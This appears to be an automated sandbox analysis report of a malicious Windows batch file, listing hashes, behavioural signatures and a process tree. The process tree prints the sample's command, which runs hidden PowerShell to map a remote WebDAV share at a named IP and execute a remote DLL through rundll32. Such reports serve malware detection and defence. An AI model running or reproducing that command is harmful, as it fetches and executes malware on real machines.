Analysis
-
max time kernel
106s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
15-07-2024 09:00
Static task
static1
Behavioral task
behavioral1
Sample
3134429865316916194.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
3134429865316916194.bat
Resource
win10v2004-20240709-en
General
-
Target
3134429865316916194.bat
-
Size
2KB
-
MD5
af40629536531ada655e52b950a75447
-
SHA1
b635611c4c09af9a25d52b67fbf725fc3ec1e1e2
-
SHA256
cb48d8ed7e19fbc30d3b2ba63e7b753c92d2c28d2bc31e9c07d1de57026ed155
-
SHA512
1a068f408afdd029d7211b7e0dfdf039f00dab39bbcd72c10d8a942c96576afd601a09c2cee3958ffcfec8cef3d0739fc16f0a6d542aaae88cd34211dcb2d834
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1080 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1080 powershell.exe 1080 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1080 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4476 wordpad.exe 4476 wordpad.exe 4476 wordpad.exe 4476 wordpad.exe 4476 wordpad.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1816 wrote to memory of 4476 1816 cmd.exe 84 PID 1816 wrote to memory of 4476 1816 cmd.exe 84 PID 1816 wrote to memory of 1080 1816 cmd.exe 86 PID 1816 wrote to memory of 1080 1816 cmd.exe 86 PID 1080 wrote to memory of 628 1080 powershell.exe 88 PID 1080 wrote to memory of 628 1080 powershell.exe 88 PID 1080 wrote to memory of 432 1080 powershell.exe 89 PID 1080 wrote to memory of 432 1080 powershell.exe 89
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3134429865316916194.bat"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:4476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\626.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:628
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\626.dll,entry3⤵PID:432
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:4348
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82